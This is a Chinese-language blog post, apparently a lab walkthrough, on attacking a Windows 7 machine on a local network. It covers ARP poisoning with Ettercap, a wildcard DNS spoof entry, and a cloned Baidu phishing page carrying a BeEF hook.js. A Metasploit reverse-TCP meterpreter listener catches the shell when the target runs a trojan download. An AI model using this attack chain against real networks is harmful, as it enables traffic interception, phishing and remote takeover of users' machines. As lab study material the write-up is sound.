

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/home.gif">
  <link rel="icon" href="/img/home.gif">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
  <title>内网渗透(arp欺骗 + DNS欺骗 + 网站钓鱼) - qiyeNuLl&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.7.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.8.11","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>qiyeNuLl's blog</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/kinko.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="内网渗透(arp欺骗 + DNS欺骗 + 网站钓鱼)">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-09-18 19:41" pubdate>
        September 18, 2021 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      11
       分钟
    </span>
  

  
  
    
      <!-- 不蒜子统计文章PV -->
      <span id="busuanzi_container_page_pv" style="display: none">
        <i class="iconfont icon-eye" aria-hidden="true"></i>
        <span id="busuanzi_value_page_pv"></span> 次
      </span>
    
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">内网渗透(arp欺骗 + DNS欺骗 + 网站钓鱼)</h1>
            
            <div class="markdown-body">
              <h1 id="内网渗透-arp欺骗-DNS欺骗-网站钓鱼"><a href="#内网渗透-arp欺骗-DNS欺骗-网站钓鱼" class="headerlink" title="内网渗透(arp欺骗 + DNS欺骗 + 网站钓鱼)"></a>内网渗透(arp欺骗 + DNS欺骗 + 网站钓鱼)</h1><hr />

<p>@<a href="%E6%96%87%E7%AB%A0%E7%9B%AE%E5%BD%95">TOC</a></p>
<hr />

<h1 id="环境"><a href="#环境" class="headerlink" title="环境"></a>环境</h1><p><font color=#999AAA >攻击机kali：192.168.241.140<br>目标机win7：192.168.241.136<br>网关：192.168.241.2<br></font></p>
<hr />



<h1 id="一、ARP数据流截取"><a href="#一、ARP数据流截取" class="headerlink" title="一、ARP数据流截取"></a>一、ARP数据流截取</h1><p>1、打开Ettercap GUI界面<br><img src="https://img-blog.csdnimg.cn/cbe703f2913a41e78e7bd454a6099f88.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5Ly96JOd5LmL5aCC,size_15,color_FFFFFF,t_70,g_se,x_16" srcset="/img/loading.gif" lazyload alt="Ettercap"><br>以上述状态，点击右上角勾勾<br><img src="https://img-blog.csdnimg.cn/f52ea82c37564972b16ef9fe8ba11529.png" srcset="/img/loading.gif" lazyload alt="Ettercap"><br>先左上角寻找网段内存活主机，并且把网关ip增加到target1，把目标机ip增加到target2上，然后选择右上星球图标，点击ARP poisoning，勾选sniff remote connections然后OK，开始攻击。</p>
<p>2.攻击</p>
<p>打开win7的cmd，查询arp地址表，发现攻击机物理地址与网关物理地址相同<br><img src="https://img-blog.csdnimg.cn/40c9301a0a8b408697fd46c5af39b301.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5Ly96JOd5LmL5aCC,size_19,color_FFFFFF,t_70,g_se,x_16" srcset="/img/loading.gif" lazyload alt="win7 arp"><br>说明arp欺骗成功<br>回到kali，执行driftnet -i eth0命令抓取截图<br>结果还算成功<br><img src="https://img-blog.csdnimg.cn/15300fdfd5174f90afe87ab408583405.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5Ly96JOd5LmL5aCC,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center" srcset="/img/loading.gif" lazyload alt="win7"></p>
<p><img src="https://img-blog.csdnimg.cn/34fa0b0e9def4ce9bfadb3aca80281c8.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5Ly96JOd5LmL5aCC,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center" srcset="/img/loading.gif" lazyload alt="kali linux"></p>
<h1 id="二、DNS欺骗"><a href="#二、DNS欺骗" class="headerlink" title="二、DNS欺骗"></a>二、DNS欺骗</h1><p>首先修改Ettercap的dns配置文件</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell">vim /etc/ettercap/etter.dns<br></code></pre></td></tr></table></figure>

<p>在19行增加一下内容</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs powershell">*.*.com   	A   <span class="hljs-number">192.168</span>.<span class="hljs-number">241.140</span>  （自己的主机ip地址）<br></code></pre></td></tr></table></figure>
<p><img src="https://img-blog.csdnimg.cn/72a660714e6c44dfbbe7d42d187789c4.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5Ly96JOd5LmL5aCC,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center" srcset="/img/loading.gif" lazyload alt="etter.dns"><br>当目标机想要访问外网地址时，必先经过网关，于是只要在网关伪造dns地址就能欺骗其目标机，给Ettercap增加插件，如图依次plugins、manage plugins、dns_spoof(前面有个*号就是在使用中了)<br><img src="https://img-blog.csdnimg.cn/5858e616470947ed8a92de616a9d4888.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5Ly96JOd5LmL5aCC,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>用目标机win7对百度进行ping通信，可以发现回显的是攻击机ip（百度ip应为163.177.151.109）<br><img src="https://img-blog.csdnimg.cn/984c5eebf60f44af928b82c62c252049.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5Ly96JOd5LmL5aCC,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"></p>
<h1 id="三、网站钓鱼"><a href="#三、网站钓鱼" class="headerlink" title="三、网站钓鱼"></a>三、网站钓鱼</h1><p>实验准备：beef、社会工程学工具包、msf、木马制作<br>安装apache: apt-get install apache<br>木马制作（并且存到网站根目录下）：<br><img src="https://img-blog.csdnimg.cn/381f37aeabbc41a2a82113f7087a3857.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5Ly96JOd5LmL5aCC,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>一、创建一个钓鱼网站<br>运用社会工程学工具包克隆一个被大众接受的网站，比如baidu.com<br>命令如下：<br>setoolkit<br>1)(社会工程学攻击)<br>  2)(web站点攻击模式)<br>    7)(HTA攻击方法)<br>       2)(网站克隆)<br>跟着数字选就行，直至这个页面：<br><img src="https://img-blog.csdnimg.cn/5b56f7657f8f4bf58f4c97b0606972c3.png#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>输入要克隆的网站，这里选择输入baidu.com<br>然后就能关了这工具（其实接下来只靠社会工程学包是可以制定攻击的，但我试了好多次都不会返回shell，之后我再试试）<br>只要访问自己的ip，能够显示克隆地百度页面，就算成功了<br>二、筹划攻击<br>msf：</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs powershell">msf6 &gt; use exploit/multi/handler<br>msf6 exploit(multi/handler) &gt; <span class="hljs-built_in">set</span> payload windows/meterpreter/reverse_tcp<br>msf6 exploit(multi/handler) &gt; <span class="hljs-built_in">set</span> LHOST <span class="hljs-number">192.168</span>.<span class="hljs-number">241.140</span><br>msf6 exploit(multi/handler) &gt; <span class="hljs-built_in">set</span> LPORT <span class="hljs-number">4444</span><br>exploit(multi/handler) &gt; exploit<br></code></pre></td></tr></table></figure>

<p>暂时放他监听就行…<br>beef:</p>
<figure class="highlight powershell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs powershell"><span class="hljs-built_in">cd</span> /usr/share/beef<span class="hljs-literal">-xss</span><br>./beef<br></code></pre></td></tr></table></figure>

<p>最新版不能用默认账号密码登录，所以要在配置里改账号和密码,在/etc/beef-xss/config.yaml<br>成功运行后：<br><img src="https://img-blog.csdnimg.cn/6c592072f45f49ae857b4dafe811a387.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5Ly96JOd5LmL5aCC,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>把图中 <a target="_blank" rel="noopener" href="http://192.168.241.140:3000/hook.js%E5%A4%8D%E5%88%B6%E5%88%B0/var/www/html/index.html%E4%B8%AD">http://192.168.241.140:3000/hook.js复制到/var/www/html/index.html中</a><br>写法如下（最后一行）：<br><img src="https://img-blog.csdnimg.cn/2091e1083e514660baf43745bc39ef5a.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5Ly96JOd5LmL5aCC,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>在这之后，我们用浏览器打开  <a target="_blank" rel="noopener" href="http://192.168.241.140:3000/ui/panel">http://192.168.241.140:3000/ui/panel</a><br>登录beef，由于之前的dns欺骗，目标一旦访问带.com结尾的网站，就会重定向到我们的钓鱼网站，这里假设目标访问了<a href="http://www.baidu.com，那么beef就会回应我们：">www.baidu.com，那么beef就会回应我们：</a><br><img src="https://img-blog.csdnimg.cn/783acd8b1082450f952b498ba1ab9ea9.png#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>可以看到目标机已经出现（192.168.241.136）浏览器用的是ie8,接下来对他进行文件欺骗<br><img src="https://img-blog.csdnimg.cn/73e91cad699f4ce296f7ee9892108877.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5Ly96JOd5LmL5aCC,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>这里有两个下载提示，一个是我用beef伪造给用户并且不会被浏览器拦截的文件(没错，这个就是我们开头做的木马)，一个是社会工程学工具包HTA攻击伪造的文件，会被拦截，而且后面无法反弹shell（试了n次）。<br><img src="https://img-blog.csdnimg.cn/6c7f1c85f393471abecf1ac2890e9483.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5Ly96JOd5LmL5aCC,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>运用beef功能，给目标一个提示，忽哟目标下载运行，<br>一旦目标运行，msf就会收到反弹回来shell连接<br><img src="https://img-blog.csdnimg.cn/9e078ae6303d4b718c1137bc7ca1fa2c.png#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>直接输入shell，在看ip，正是目标机：<br><img src="https://img-blog.csdnimg.cn/b5210f39ce8645fabe366519a1e8e0d7.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50,text_Q1NETiBA5Ly96JOd5LmL5aCC,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center" srcset="/img/loading.gif" lazyload alt="在这里插入图片描述"><br>接下来就是提权了</p>
<hr />

<h1 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h1><p><font color=#999AAA >同个局域网内，首先进行主机发掘，选定目标对其进行arp欺骗，然后对其流量分析，想尽办法与目标主机交互，在发现没有正面攻击手段时，可以选择DNS欺骗，对目标外出流量进行拦截和欺骗，想方设法使其访问我们的钓鱼网站或下载木马文件，绕过浏览器拦截极其重要。</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E5%86%85%E7%BD%91%E6%B8%97%E9%80%8F/">内网渗透</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/web/">web</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/09/21/DHCP%E3%80%81FTP%E6%9C%8D%E5%8A%A1%E5%99%A8%E6%90%AD%E5%BB%BA/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">DHCP和FTP服务器的配置与管理</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/09/18/hello-world/">
                        <span class="hidden-mobile">Hello World</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.3/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.1/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script  src="/js/local-search.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.12/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>












  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
